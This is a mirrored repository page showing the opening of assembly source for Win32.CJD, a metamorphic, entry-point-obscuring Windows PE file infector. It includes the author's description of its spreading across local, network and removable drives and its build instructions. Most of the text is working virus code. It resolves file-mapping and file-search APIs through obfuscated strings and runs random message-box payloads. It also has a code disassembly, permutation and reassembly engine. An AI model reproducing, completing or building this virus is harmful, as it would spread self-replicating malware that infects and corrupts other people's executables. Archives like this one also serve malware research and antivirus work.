Mirrors/vxug-MalwareSourceCode
13
1
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode synced 2024-06-16 12:08:36 +00:00
Code Releases Activity
464e532a4b
vxug-MalwareSourceCode/Win32/Win32.CJD.asm
vxunderground 3cac606e5f
Add files via upload
2020-10-10 22:07:43 -05:00

12103 lines
435 KiB
NASM
Raw Blame History

;
;
; CREUTZFELDT-JAKOB DISEASE BioCoded by Neurobasher/Germany
; ---------------------------------------------------------
;
;
;
;
; Index:
; ------
;
; 1 - About the biological version
; 2 - Author's description
; 3 - [WIN32.CJD] source code
;
;
;
;
; 1 - About the biological version
; --------------------------------
;
;
;---------------------------------------
;What is Bovine Spongiform Encephalopaty
;---------------------------------------
;
;BSE is a progressive, fatal neurologic disorder of cattle and is classified as one of the transmissible
;spongiform encephalopathies, a group of diseases of animals and humans believed to be caused by abnormally
;folded proteins called prions. The disease itself is known since 1920 and is often called the 'mad cow disease'.
;BSE was first identified in 1986 in the United Kingdom (UK), where it caused a large outbreak
;among cattle. Although the source of the BSE epizootic agent is uncertain, feeding cattle BSE-contaminated
;meat-and-bone meal is the major contributory factor to the amplification of BSE among cattle. Since 1986,
;BSE cases have been identified in 20 European countries, Japan, Israel, and Canada.
;
;The appearance of the new variant of CJD in several younger than average people in Great Britain and France
;has led to concern that BSE may be transmitted to humans through consumption of contaminated beef. Although
;laboratory tests have shown a strong similarity between the prions causing BSE and CJD, there is no direct
;proof to support this theory.
;
;----------------------------------
;What is Creutzfeldt-Jakob Disease?
;----------------------------------
;
;Creutzfeldt-Jakob disease (CJD) is a rare, degenerative, invariably fatal brain disorder.
;Typically, onset of symptoms occurs at about age 60.. There are three major categories of CJD:
;sporadic CJD, hereditary CJD, and acquired CJD. There is currently no single diagnostic test for CJD.
;The first concern is to rule out treatable forms of dementia such as encephalitis or chronic meningitis.
;The only way to confirm a diagnosis of CJD is by brain biopsy or autopsy. In a brain biopsy,
;a neurosurgeon removes a small piece of tissue from the patient's brain so that is can be examined
;by a neurologist. Because a correct diagnosis of CJD does not help the patient, a brain biopsy
;is discouraged unless it is need to rule out a treatable disorder. While CJD can be transmitted to
;other people, the risk of this happening is extremely small.
;
;There is no treatment that can cure or control CJD. Current treatment is aimed at alleviating symptoms
;and making the patient as comfortable as possible. Opiate drugs can help relieve pain, and the drugs
;clonazepam and sodium valproate may help relieve involuntary muscle jerks.
;
;About 90 percent of patients die within 1 year. In the early stages of disease, patients may have
;failing memory, behavioral changes, lack of coordination and visual disturbances. As the illness progresses,
;mental deterioration becomes pronounced and involuntary movements, blindness, weakness of extremities,
;and coma may occur.
;
;The leading scientific theory at this time maintains that CJD is caused by a type of protein called a prion.
;The harmless and the infectious forms of the prion protein are nearly identical, but the infectious form
;takes a different folded shape than the normal protein. Researchers are examining whether the transmissible
;agent is, in fact, a prion and trying to discover factors that influence prion infectivity and how the disorder
;damages the brain. Using rodent models of the disease and brain tissue from autopsies, they are also trying to
;identify factors that influence the susceptibility to the disease and that govern when in life the disease appears.
;
;
;
; 2 - Authors description
; -----------------------
;
;It is a very complex parasitic highly polymorphic Win32 virus that uses the entry-point ;obscuring technique.
;The virus uses a metamorphic engine and permutates its code.
;The virus infects Windows executable files (Win32 PE EXE). When run
;the virus searches for these files and randomly infects them by different infection sheme.
;The virus searches for Win32 PE executable files in the current and five levels upper
;directories, also on the available network and removable media and in the directories if
;their names not begin with "W", and infects them. The virus doesn't infect files if their
;names begin with several suspicious caracters like anti*,...
;
;or if the name contains the 'V' letter, and depending on the random counter value.
;While infecting files the virus rebuilds and encrypts its body and writes it to one of the
;host file's sections. Then, it searches for and replaces one of the calls to the
;"ExitProcess" function in the host's code section with the call to the viral code.
;Several functions depends on randomness and are mutated from generation to generation also.
;
;Payload
;Depending on the system date the virus displays various messages
;There's a really small chance the virus allows multipe infections of the files.
;This files were corrupted and won't work anymore.
;
;
; 3 - Win32 source code
; ---------------------
; bugfixed vers.
;
; To get first generation file use TASM 5.0r
; c:\tasm32 -ml -m9 -q cjdiseae.asm
; c:\tlink32 -Tpe -c -x -aa -r cjdisease.obj,,,import32
;
.386p
.model flat
locals
.code
ret
.data
AddressToFree dd 0
extrn ExitProcess:PROC
extrn VirtualAlloc:PROC
extrn VirtualFree:PROC
extrn GetModuleHandleA:PROC
extrn GetProcAddress:PROC
extrn MessageBoxA:PROC
PreMain proc
push 4
push 1000h
push 350000h
push 0
call VirtualAlloc
or eax, eax
jz @@Error
mov ebp, eax
mov [AddressToFree], eax
mov ebx, eax
mov esi, offset Main
mov edi, eax
mov ecx, offset EndOfCode
sub ecx, offset Main
rep movsb ; Copy virus
push __DISASM2_SECTION
push __DATA_SECTION
push __BUFFERS_SECTION
push __DISASM_SECTION
push __CODE_SECTION
mov eax, offset GetProcAddress
mov eax, [eax+2]
push eax
mov eax, offset GetModuleHandleA
mov eax, [eax+2]
push eax
push 5*2 ; Bit 0=0: 'A', 1
call ebx
push 0C000h
push 0
push dword ptr [AddressToFree]
call VirtualFree
@@Error:
push 0
jmp @@Dropper
title: db ' [Win32.CJD] was done by <<<NEUROBASHER/GERMANY>>> ',0
body: db ' Creutzfeldt-Jakob Disease ',0ah,0dh
db ' rare, degenerative, invariably fatal brain disorder. ',0ah,0dh
db ' ------------- ',0ah,0dh
db ' [BSE] Bovine Spongiform Encephalopaty ',0ah,0dh
db ' well known as mad-cow-disease ',0ah,0dh
db ' ',0ah,0dh
db ' f i r s t g e n e r a t i o n e x e c u t e d . . . ',0
@@Dropper:
push 0h
push offset title
push offset body
push 0h
call MessageBoxA
push 0h
call ExitProcess
PreMain endp
__CODE_SECTION EQU 000000h
__DISASM_SECTION EQU 100000h
__BUFFERS_SECTION EQU 080000h
__LABEL_SECTION EQU __BUFFERS_SECTION + 00000h
__VARIABLE_SECTION EQU __BUFFERS_SECTION + 10000h
__BUFFER1_SECTION EQU __BUFFERS_SECTION + 20000h
__BUFFER2_SECTION EQU __BUFFERS_SECTION + 30000h
__VAR_MARKS_SECTION EQU __BUFFERS_SECTION + 40000h
__DATA_SECTION EQU 0E0000h
__DISASM2_SECTION EQU 200000h
NumberOfLabels EQU __DATA_SECTION + 0000h
NumberOfInstructions EQU __DATA_SECTION + 0008h
InstructionTable EQU __DATA_SECTION + 0010h
LabelTable EQU __DATA_SECTION + 0018h
FutureLabelTable EQU __DATA_SECTION + 0020h
PathMarksTable EQU __DATA_SECTION + 0028h
NumberOfLabelsPost EQU __DATA_SECTION + 0030h
AddressOfLastInstruction EQU __DATA_SECTION + 0038h
VariableTable EQU __DATA_SECTION + 0040h
NumberOfVariables EQU __DATA_SECTION + 0048h
FramesTable EQU __DATA_SECTION + 0050h
PermutationResult EQU __DATA_SECTION + 0058h
JumpsTable EQU __DATA_SECTION + 0060h
AddressOfLastFrame EQU __DATA_SECTION + 0068h
PositionOfFirstInstruction EQU __DATA_SECTION + 0070h
MODValue EQU __DATA_SECTION + 0078h
NumberOfJumps EQU __DATA_SECTION + 0080h
RndSeed1 EQU __DATA_SECTION + 0088h
RndSeed2 EQU __DATA_SECTION + 0090h
ExpansionResult EQU __DATA_SECTION + 0098h
Register8Bits EQU __DATA_SECTION + 00A0h
Xp_Register0 EQU __DATA_SECTION + 00A8h
Xp_Register1 EQU __DATA_SECTION + 00B0h
Xp_Register2 EQU __DATA_SECTION + 00B8h
Xp_Register3 EQU __DATA_SECTION + 00C0h
Xp_Register4 EQU __DATA_SECTION + 00C8h
Xp_Register5 EQU __DATA_SECTION + 00D0h
Xp_Register6 EQU __DATA_SECTION + 00D8h
Xp_Register7 EQU __DATA_SECTION + 00E0h
DeltaRegister EQU __DATA_SECTION + 00E8h
Xp_8Bits EQU __DATA_SECTION + 00F0h
Xp_Operation EQU __DATA_SECTION + 00F8h
Xp_Register EQU __DATA_SECTION + 0100h
Xp_Mem_Index1 EQU __DATA_SECTION + 0108h
Xp_Mem_Index2 EQU __DATA_SECTION + 0110h
Xp_Mem_Addition EQU __DATA_SECTION + 0118h
Xp_Immediate EQU __DATA_SECTION + 0120h
Xp_SrcRegister EQU __DATA_SECTION + 0128h
Xp_FlagRegOrMem EQU __DATA_SECTION + 0130h
Xp_RecurseLevel EQU __DATA_SECTION + 0138h
Xp_LEAAdditionFlag EQU __DATA_SECTION + 0140h
VarMarksTable EQU __DATA_SECTION + 0148h
_BUFFERS_SECTION EQU __DATA_SECTION + 0150h
_CODE_SECTION EQU __DATA_SECTION + 0158h
_DISASM_SECTION EQU __DATA_SECTION + 0160h
_LABEL_SECTION EQU __DATA_SECTION + 0168h
_VARIABLE_SECTION EQU __DATA_SECTION + 0170h
_BUFFER1_SECTION EQU __DATA_SECTION + 0178h
_BUFFER2_SECTION EQU __DATA_SECTION + 0180h
_VAR_MARKS_SECTION EQU __DATA_SECTION + 0188h
_DATA_SECTION EQU __DATA_SECTION + 0190h
_DISASM2_SECTION EQU __DATA_SECTION + 0198h
New_CODE_SECTION EQU __DATA_SECTION + 01A0h
New_DISASM_SECTION EQU __DATA_SECTION + 01A8h
New_BUFFERS_SECTION EQU __DATA_SECTION + 01B0h
; New_LABEL_SECTION EQU __DATA_SECTION + 01B0h
; New_VARIABLE_SECTION EQU __DATA_SECTION + 01B8h
; New_BUFFER1_SECTION EQU __DATA_SECTION + 01C0h
; New_BUFFER2_SECTION EQU __DATA_SECTION + 01C8h
; New_VAR_MARKS_SECTION EQU __DATA_SECTION + 01D0h
New_DATA_SECTION EQU __DATA_SECTION + 01D8h
New_DISASM2_SECTION EQU __DATA_SECTION + 01E0h
RVA_GetModuleHandle EQU __DATA_SECTION + 01E8h
RVA_GetProcAddress EQU __DATA_SECTION + 01F0h
FlagAorW EQU __DATA_SECTION + 01F8h
ReturnValue EQU __DATA_SECTION + 0200h
hKernel EQU __DATA_SECTION + 0208h
hUser32 EQU __DATA_SECTION + 0210h
RVA_CreateFileA EQU __DATA_SECTION + 0218h
RVA_CreateFileMappingA EQU __DATA_SECTION + 0220h
RVA_MapViewOfFile EQU __DATA_SECTION + 0228h
RVA_UnmapViewOfFile EQU __DATA_SECTION + 0230h
RVA_GetFileSize EQU __DATA_SECTION + 0238h
RVA_GetFileAttributesA EQU __DATA_SECTION + 0240h
RVA_SetFileAttributesA EQU __DATA_SECTION + 0248h
RVA_SetFilePointer EQU __DATA_SECTION + 0250h
RVA_SetFileTime EQU __DATA_SECTION + 0258h
RVA_SetEndOfFile EQU __DATA_SECTION + 0260h
RVA_FindFirstFileA EQU __DATA_SECTION + 0268h
RVA_FindNextFileA EQU __DATA_SECTION + 0270h
RVA_FindClose EQU __DATA_SECTION + 0278h
RVA_CloseHandle EQU __DATA_SECTION + 0280h
RVA_MessageBoxA EQU __DATA_SECTION + 0288h
NewLabelTable EQU __DATA_SECTION + 0290h
Asm_ByteToSort EQU __DATA_SECTION + 0298h
JumpRelocationTable EQU __DATA_SECTION + 02A0h
NumberOfJumpRelocations EQU __DATA_SECTION + 02A8h
Permut_LastInstruction EQU __DATA_SECTION + 02B0h
TranslatedDeltaRegister EQU __DATA_SECTION + 02B8h
hFile EQU __DATA_SECTION + 02C0h
FileSize EQU __DATA_SECTION + 02C8h
OriginalFileSize EQU __DATA_SECTION + 02D0h
hMapping EQU __DATA_SECTION + 02D8h
MappingAddress EQU __DATA_SECTION + 02E0h
HeaderAddress EQU __DATA_SECTION + 02E8h
StartOfSectionHeaders EQU __DATA_SECTION + 02F0h
RelocHeader EQU __DATA_SECTION + 02F8h
TextHeader EQU __DATA_SECTION + 0300h
DataHeader EQU __DATA_SECTION + 0308h
RVA_TextHole EQU __DATA_SECTION + 0310h
Phys_TextHole EQU __DATA_SECTION + 0318h
TextHoleSize EQU __DATA_SECTION + 0320h
RVA_DataHole EQU __DATA_SECTION + 0328h
Phys_DataHole EQU __DATA_SECTION + 0330h
MakingFirstHole EQU __DATA_SECTION + 0338h
ExitProcessAddress EQU __DATA_SECTION + 0340h
GetModuleHandleAddress EQU __DATA_SECTION + 0348h
GetProcAddressAddress EQU __DATA_SECTION + 0350h
VirtualAllocAddress EQU __DATA_SECTION + 0358h
GetModuleHandleMode EQU __DATA_SECTION + 0360h
VirtualPositionOfVar EQU __DATA_SECTION + 0368h
PhysicalPositionOfVar EQU __DATA_SECTION + 0370h
Kernel32Imports EQU __DATA_SECTION + 0378h
hFindFile EQU __DATA_SECTION + 0380h
Addr_FilePath EQU __DATA_SECTION + 0388h
FileAttributes EQU __DATA_SECTION + 0390h
SizeOfNewCode EQU __DATA_SECTION + 0398h
FindFileData EQU __DATA_SECTION + 03A0h
OtherBuffers EQU __DATA_SECTION + 03A8h
RoundedSizeOfNewCode EQU __DATA_SECTION + 03B0h
NewAssembledCode EQU __DATA_SECTION + 03B8h
NumberOfUndoActions EQU __DATA_SECTION + 03C0h
LastHeader EQU __DATA_SECTION + 03C8h
MaxSizeOfDecryptor EQU __DATA_SECTION + 03D0h
CreatingADecryptor EQU __DATA_SECTION + 03D8h
DecryptorPseudoCode EQU __DATA_SECTION + 03E0h
AssembledDecryptor EQU __DATA_SECTION + 03E8h
Decryptor_DATA_SECTION EQU __DATA_SECTION + 03F0h
SizeOfExpansion EQU __DATA_SECTION + 03F8h
SizeOfDecryptor EQU __DATA_SECTION + 0400h
TypeOfEncryption EQU __DATA_SECTION + 0408h
EncryptionKey EQU __DATA_SECTION + 0410h
IndexValue EQU __DATA_SECTION + 0418h
IndexRegister EQU __DATA_SECTION + 0420h
BufferRegister EQU __DATA_SECTION + 0428h
CounterRegister EQU __DATA_SECTION + 0430h
BufferValue EQU __DATA_SECTION + 0438h
CounterValue EQU __DATA_SECTION + 0440h
Poly_FirstPartOfFunction EQU __DATA_SECTION + 0448h
Poly_SecondPartOfFunction EQU __DATA_SECTION + 0450h
Poly_ThirdPartOfFunction EQU __DATA_SECTION + 0458h
AdditionToBuffer EQU __DATA_SECTION + 0460h
Poly_Jump_ErrorInVirtualAlloc EQU __DATA_SECTION+0468h
;Index2Register EQU __DATA_SECTION + 0470h
Poly_LoopLabel EQU __DATA_SECTION + 0478h
RVA_GetSystemTime EQU __DATA_SECTION + 0480h
RVA_GetTickCount EQU __DATA_SECTION + 0488h
RVA_GetDriveTypeA EQU __DATA_SECTION + 0490h
RVA_GetLogicalDriveStringsA EQU __DATA_SECTION + 0498h
RVA_SetCurrentDirectoryA EQU __DATA_SECTION + 04A0h
StartOfEncryptedData EQU __DATA_SECTION + 04A8h
SizeOfNewCodeP2 EQU __DATA_SECTION + 04B0h
Poly_InitialValue EQU __DATA_SECTION + 04B8h
Poly_Addition EQU __DATA_SECTION + 04C0h
Poly_ExcessJumpInstruction EQU __DATA_SECTION + 04C8h
DirectoryDeepness EQU __DATA_SECTION + 04D0h
RVA_GetSystemDefaultLCID EQU __DATA_SECTION + 04D8h
Poly_JumpRandomExecution EQU __DATA_SECTION + 04E0h
Main proc
; EBP = Delta offset
pop ebx
pop eax
mov ecx, eax
and eax, 1
mov [ebp+FlagAorW], eax
and ecx, 0FFFFFFFEh
shr ecx, 1
mov [ebp+DeltaRegister], ecx
pop eax
mov eax, [eax]
mov [ebp+RVA_GetModuleHandle], eax
pop eax
mov eax, [eax]
mov [ebp+RVA_GetProcAddress], eax
pop eax
and eax, 03FFFFFh
mov [ebp+_CODE_SECTION], eax
pop eax
and eax, 03FFFFFh
mov [ebp+_DISASM_SECTION], eax
pop eax
and eax, 03FFFFFh
mov [ebp+_BUFFERS_SECTION], eax
mov [ebp+_LABEL_SECTION], eax
add eax, 10000h
mov [ebp+_VARIABLE_SECTION], eax
add eax, 10000h
mov [ebp+_BUFFER1_SECTION], eax
add eax, 10000h
mov [ebp+_BUFFER2_SECTION], eax
add eax, 10000h
mov [ebp+_VAR_MARKS_SECTION], eax
pop eax
and eax, 03FFFFFh
mov [ebp+_DATA_SECTION], eax
pop eax
and eax, 03FFFFFh
mov [ebp+_DISASM2_SECTION], eax
push ebx ; Restore return value
mov edx, [ebp+_BUFFER1_SECTION]
add edx, ebp
push eax
push ecx
push edx ; APICALL_BEGIN
mov eax, 'nrek'
mov [edx], eax
mov eax, '23le'
mov [edx+4], eax
mov eax, 'lld.'
mov [edx+8], eax
xor eax, eax
mov [edx+0Ch], eax
call APICall_GetModuleHandle
pop edx
pop ecx
pop eax
mov eax, [ebp+ReturnValue]
or eax, eax
jz @@Error
mov [ebp+hKernel], eax
push eax
push ecx
push edx
mov eax, 'resu'
mov [edx], eax
mov eax, 'd.23'
mov [edx+4], eax
mov eax, 'll'
mov [edx+8], eax
call APICall_GetModuleHandle
pop edx
pop ecx
pop eax
mov eax, [ebp+ReturnValue]
mov [ebp+hUser32], eax
mov edx, [ebp+_BUFFER1_SECTION]
add edx, ebp
mov edi, [ebp+hKernel]
mov eax, 'aerC'
mov [edx], eax
mov eax, 'iFet'
mov [edx+4], eax
mov eax, 'Ael'
mov [edx+8], eax
call GetFunction
or eax, eax
jz @@Error
mov [ebp+RVA_CreateFileA], eax
mov eax, 'ppaM'
mov [edx+0Ah], eax
mov eax, 'Agni'
mov [edx+0Eh], eax
xor eax, eax
mov [edx+12h], eax
call GetFunction
or eax, eax
jz @@Error
mov [ebp+RVA_CreateFileMappingA], eax
add edx, 2
mov eax, 'VpaM'
mov [edx], eax
mov eax, 'Owei'
mov [edx+4], eax
mov eax, 'liFf'
mov [edx+8], eax
mov eax, 'e'
mov [edx+0Ch], eax
call GetFunction
or eax, eax
jz @@Error
mov [ebp+RVA_MapViewOfFile], eax
sub edx, 2
mov eax, 'amnU'
mov [edx], eax
call GetFunction
or eax, eax
jz @@Error
mov [ebp+RVA_UnmapViewOfFile], eax
mov eax, 'SteG'
mov [edx], eax
mov eax, 'etsy'
mov [edx+4], eax
mov eax, 'miTm'
mov [edx+8], eax
mov eax, 'e'
mov [edx+0Ch], eax
call GetFunction
or eax, eax
jz @@Error
mov [ebp+RVA_GetSystemTime], eax
mov eax, 'virD'
mov [edx+3], eax
mov eax, 'pyTe'
mov [edx+7], eax
mov eax, 'Ae'
mov [edx+0Bh], eax
call GetFunction
or eax, eax
jz @@Error
mov [ebp+RVA_GetDriveTypeA], eax
mov eax, 'igoL'
mov [edx+3], eax
mov eax, 'Dlac'
mov [edx+7], eax
mov eax, 'evir'
mov [edx+0Bh], eax
mov eax, 'irtS'
mov [edx+0Fh], eax
mov eax, 'Asgn'
mov [edx+13h], eax
xor eax, eax
mov [edx+17h], eax
call GetFunction
or eax, eax
jz @@Error
mov [ebp+RVA_GetLogicalDriveStringsA], eax
mov eax, 'tsyS'
mov [edx+3], eax
mov eax, 'eDme'
mov [edx+7], eax
mov eax, 'luaf'
mov [edx+0Bh], eax
mov eax, 'ICLt'
mov [edx+0Fh], eax
mov eax, 'D'
mov [edx+13h], eax
call GetFunction
or eax, eax
jz @@Error
mov [ebp+RVA_GetSystemDefaultLCID], eax
mov eax, 'CteS'
mov [edx], eax
mov eax, 'erru'
mov [edx+4], eax
mov eax, 'iDtn'
mov [edx+8], eax
mov eax, 'tcer'
mov [edx+0Ch], eax
mov eax, 'Ayro'
mov [edx+10h], eax
xor eax, eax
mov [edx+14h], eax
call GetFunction
or eax, eax
jz @@Error
mov [ebp+RVA_SetCurrentDirectoryA], eax
mov eax, 'FteG'
mov [edx], eax
mov eax, 'Seli'
mov [edx+4], eax
mov eax, 'ezi'
mov [edx+8], eax
call GetFunction
or eax, eax
jz @@Error
mov [ebp+RVA_GetFileSize], eax
mov eax, 'rttA'
mov [edx+7], eax
mov eax, 'tubi'
mov [edx+0Bh], eax
mov eax, 'Ase'
mov [edx+0Fh], eax
call GetFunction
or eax, eax
jz @@Error
mov [ebp+RVA_GetFileAttributesA], eax
mov eax, 'FteS'
mov [edx], eax
call GetFunction
or eax, eax
jz @@Error
mov [ebp+RVA_SetFileAttributesA], eax
mov eax, 'nioP'
mov [edx+7], eax
mov eax, 'ret'
mov [edx+0Bh], eax
call GetFunction
or eax, eax
jz @@Error
mov [ebp+RVA_SetFilePointer], eax
mov eax, 'emiT'
mov [edx+7], eax
xor eax, eax
mov [edx+0Bh], eax
call GetFunction
or eax, eax
jz @@Error
mov [ebp+RVA_SetFileTime], eax
mov eax, 'OdnE'
mov [edx+3], eax
mov eax, 'liFf'
mov [edx+7], eax
mov eax, 'e'
mov [edx+0Bh], eax
call GetFunction
or eax, eax
jz @@Error
mov [ebp+RVA_SetEndOfFile], eax
mov eax, 'dniF'
mov [edx], eax
mov eax, 'sriF'
mov [edx+4], eax
mov eax, 'liFt'
mov [edx+8], eax
mov eax, 'Ae'
mov [edx+0Ch], eax
call GetFunction
or eax, eax
jz @@Error
mov [ebp+RVA_FindFirstFileA], eax
mov eax, 'txeN'
mov [edx+4], eax
mov eax, 'eliF'
mov [edx+8], eax
mov eax, 'A'
mov [edx+0Ch], eax
call GetFunction
or eax, eax
jz @@Error
mov [ebp+RVA_FindNextFileA], eax
mov eax, 'solC'
mov [edx+4], eax
mov eax, 'e'
mov [edx+8], eax
call GetFunction
or eax, eax
jz @@Error
mov [ebp+RVA_FindClose], eax
add edx, 4
mov eax, 'dnaH'
mov [edx+5], eax
mov eax, 'el'
mov [edx+9], eax
call GetFunction
or eax, eax
jz @@Error
mov [ebp+RVA_CloseHandle], eax
sub edx, 4
mov edi, [ebp+hUser32]
mov eax, 'sseM'
mov [edx], eax
mov eax, 'Bega'
mov [edx+4], eax
mov eax, 'Axo'
mov [edx+8], eax
call GetFunction
mov [ebp+RVA_MessageBoxA], eax
push eax
push ecx
push edx
mov eax, [ebp+_BUFFER1_SECTION]
add eax, ebp
push eax
call dword ptr [ebp+RVA_GetSystemTime]
pop edx
pop ecx
pop eax
mov ebx, [ebp+_BUFFER1_SECTION]
add ebx, ebp
mov eax, [ebx+04h]
add eax, [ebx+0Ch]
mov [ebp+RndSeed1], eax
add eax, [ebx+08h]
mov [ebp+RndSeed2], eax
mov eax, [ebp+RVA_MessageBoxA]
or eax, eax
jz @@NoPayload
;; Simple, silly MessageBox with a partly metamorphic message :)
mov edx, [ebp+_BUFFER1_SECTION]
add edx, ebp
mov eax, [edx+2]
and eax, 0FFh
@@ChoosePayload:
call Random
and eax, 3
cmp eax, 1
je @@CheckPayload
cmp eax, 2
je @@CheckPayload2
cmp eax, 3
je @@CheckPayload3
cmp eax, 0
je @@EndPayload
@@CheckPayload:
call Random
and eax, 03Fh
jnz @@EndPayload
push edx
call Random
and eax, 00000000h
add eax, 'DJC[' ;; "[CJD"
mov [edx], eax
add edx, 4
call Random
and eax, 20200000h
add eax, 'RC ]' ;; "] CR"
mov [edx], eax
add edx, 4
call Random
and eax, 20202020h
add eax, 'ZTUE' ;; "EUTZ"
mov [edx], eax
add edx, 4
call Random
and eax, 20202020h
add eax, 'DLEF' ;; "FELD"
mov [edx], eax
add edx, 4
call Random
and eax, 20200020h
add eax, 'AJ-T' ;; "T-JA"
mov [edx], eax
add edx, 4
call Random
and eax, 00202020h
add eax, ' BOK' ;; "KOB "
mov [edx], eax
add edx, 4
call Random
and eax, 20202020h
add eax, 'ESID' ;; "DISE"
mov [edx], eax
add edx, 4
call Random
and eax, 00202020h
add eax, ' ESA' ;; "ASE "
mov [edx], eax
call Random
and eax, 2
jnz @@TruncatePayload
add edx, 4
call Random
and eax, 00000000h
add eax, ' )c(' ;; " (c)"
mov [edx], eax
add edx, 4
call Random
and eax, 00000000h
add eax, 'N yb' ;; "by N"
mov [edx], eax
add edx, 4
call Random
and eax, 00000000h
add eax, 'orue' ;; "euro"
mov [edx], eax
add edx, 4
call Random
and eax, 00000000h
add eax, 'hsab' ;; "bash"
mov [edx], eax
add edx, 4
call Random
and eax, 00000000h
add eax, 'G/re' ;; "er/G"
mov [edx], eax
add edx, 4
call Random
and eax, 00000000h
add eax, 'amre' ;; "erma"
mov [edx], eax
add edx, 4
call Random
and eax, 00000000h
add eax, ' yn' ;; "ny "
mov [edx], eax
@@TruncatePayload:
pop edx
; "[CJD] Creutzfeldt-Jakob Disease"
; and sometimes "by Neurobasher/Germany"
push eax ; first part with random upcases and lowcases.
push ecx
push edx
xor eax, eax
push eax
mov eax, edx
push eax
push eax
xor eax, eax
push eax
call dword ptr [ebp+RVA_MessageBoxA]
pop edx
pop ecx
pop eax
jmp @@EndPayload
@@CheckPayload2:
call Random
and eax, 1FFh
jnz @@CheckPayload3
push edx
xor eax, eax
call Random
and eax, 20202020h
add eax, 'IVOB' ;; "BOVI"
mov [edx], eax
add edx, 4
call Random
and eax, 20002020h
add eax, 'S EN' ;; "NE S"
mov [edx], eax
add edx, 4
call Random
and eax, 20202020h
add eax, 'GNOP' ;; "PONG"
mov [edx], eax
add edx, 4
call Random
and eax, 20202020h
add eax, 'ROFI' ;; "IFOR"
mov [edx], eax
add edx, 4
call Random
and eax, 20002020h
add eax, 'NE M' ;; "M EN"
mov [edx], eax
add edx, 4
call Random
and eax, 20202020h
add eax, 'HPEC' ;; "CEPH"
mov [edx], eax
add edx, 4
call Random
and eax, 20202020h
add eax, 'POLA' ;; "ALOP"
mov [edx], eax
add edx, 4
call Random
and eax, 00202020h
add eax, ' YTA' ;; "ATY "
mov [edx], eax
pop edx
push eax
push ecx
push edx
xor eax, eax
push eax
mov eax, edx
push eax
push eax
xor eax, eax
push eax
call dword ptr [ebp+RVA_MessageBoxA]
pop edx
pop ecx
pop eax
@@CheckPayload3:
call Random
and eax, 1FFh
jnz @@EndPayload
push edx
xor eax, eax
call Random
and eax, 00202020h
add eax, ' DAM' ;; "MAD "
mov [edx], eax
add edx, 4
call Random
and eax, 00202020h
add eax, ' WOC' ;; "COW "
mov [edx], eax
add edx, 4
call Random
and eax, 20202020h
add eax, 'ESID' ;; "DISE"
mov [edx], eax
add edx, 4
call Random
and eax, 00202020h
add eax, ' ESA' ;; "ASE "
mov [edx], eax
pop edx
push eax
push ecx
push edx
xor eax, eax
push eax
mov eax, edx
push eax
push eax
xor eax, eax
push eax
call dword ptr [ebp+RVA_MessageBoxA]
pop edx
pop ecx
pop eax
@@EndPayload:
@@NoPayload:
mov esi, [ebp+_DISASM_SECTION]
add esi, ebp
xor eax, eax
push esi
@@LoopGarbleSect_01:
mov ebx, eax
add eax, 1
mov ecx, eax
add eax, 1
mov edx, eax
add eax, 1
push eax
call Xp_GarbleRegisters
pop eax
mov [esi], ebx
mov [esi+4], ecx
mov [esi+8], edx
add esi, 0Ch
cmp eax, 6
jnz @@LoopGarbleSect_01
pop esi
push esi
mov ecx, 2
@@LoopGarbleSect_02:
push ecx
mov ebx, [esi]
mov ecx, [esi+08h]
mov edx, [esi+10h]
call Xp_GarbleRegisters
mov [esi], ebx
mov [esi+08h], ecx
mov [esi+10h], edx
pop ecx
add esi, 4
sub ecx, 1
or ecx, ecx
jnz @@LoopGarbleSect_02
pop esi
mov ecx, 6
xor edx, edx
@@LoopGarbleSect_03:
call Random
and eax, 7FFFh
add edx, eax
mov eax, [esi]
or eax, eax
jz @@GarbleSect_CodeSection
cmp eax, 1
jz @@GarbleSect_DisasmSection
cmp eax, 2
jz @@GarbleSect_BuffersSection
cmp eax, 3
jz @@GarbleSect_DataSection
cmp eax, 4
jnz @@GarbleSect_Next
@@GarbleSect_Disasm2Section:
mov [ebp+New_DISASM2_SECTION], edx
add edx, 100000h
jmp @@GarbleSect_Next
@@GarbleSect_CodeSection:
mov [ebp+New_CODE_SECTION], edx
add edx, 80000h
jmp @@GarbleSect_Next
@@GarbleSect_DisasmSection:
mov [ebp+New_DISASM_SECTION], edx
add edx, 100000h
jmp @@GarbleSect_Next
@@GarbleSect_BuffersSection:
mov [ebp+New_BUFFERS_SECTION], edx
add edx, 60000h
jmp @@GarbleSect_Next
@@GarbleSect_DataSection:
mov [ebp+New_DATA_SECTION], edx
add edx, 20000h
@@GarbleSect_Next:
add esi, 4
sub ecx, 1
or ecx, ecx
jnz @@LoopGarbleSect_03
mov eax, [ebp+_DISASM_SECTION]
add eax, ebp
mov [ebp+InstructionTable], eax
mov eax, [ebp+_LABEL_SECTION]
add eax, ebp
mov [ebp+LabelTable], eax
mov eax, [ebp+_BUFFER1_SECTION]
add eax, ebp
mov [ebp+FutureLabelTable], eax
mov eax, [ebp+_DISASM2_SECTION]
add eax, ebp
mov [ebp+PathMarksTable], eax
mov esi, [ebp+_CODE_SECTION]
add esi, ebp
call DisasmCode
nop
mov [ebp+AddressOfLastInstruction], edi
call ShrinkCode
mov eax, [ebp+_VARIABLE_SECTION]
add eax, ebp
mov [ebp+VariableTable], eax
mov eax, [ebp+_VAR_MARKS_SECTION]
add eax, ebp
mov [ebp+VarMarksTable], eax
mov ecx, [ebp+DeltaRegister]
call IdentifyVariables
mov eax, [ebp+_BUFFER1_SECTION]
add eax, ebp
mov [ebp+FramesTable], eax
mov eax, [ebp+_DISASM2_SECTION]
add eax, ebp
mov [ebp+PermutationResult], eax
mov eax, [ebp+_BUFFER2_SECTION]
add eax, ebp
mov [ebp+JumpsTable], eax
call PermutateCode
mov eax, [ebp+PermutationResult]
mov [ebp+InstructionTable], eax
xor eax, eax
mov [ebp+CreatingADecryptor], eax
mov eax, [ebp+_DISASM_SECTION]
add eax, ebp
mov [ebp+ExpansionResult], eax
xor eax, eax
mov [ebp+SizeOfExpansion], eax
call XpandCode
mov eax, [ebp+ExpansionResult]
mov [ebp+InstructionTable], eax
mov eax, [ebp+_DISASM2_SECTION]
add eax, ebp
mov [ebp+NewAssembledCode], eax
mov eax, [ebp+_VARIABLE_SECTION]
add eax, ebp
mov [ebp+NewLabelTable], eax
mov eax, [ebp+_BUFFER1_SECTION]
add eax, ebp
mov [ebp+JumpRelocationTable], eax
call AssembleCode
mov eax, [ebp+_DISASM_SECTION]
add eax, ebp
mov [ebp+DecryptorPseudoCode], eax
add eax, 80000h
mov [ebp+AssembledDecryptor], eax
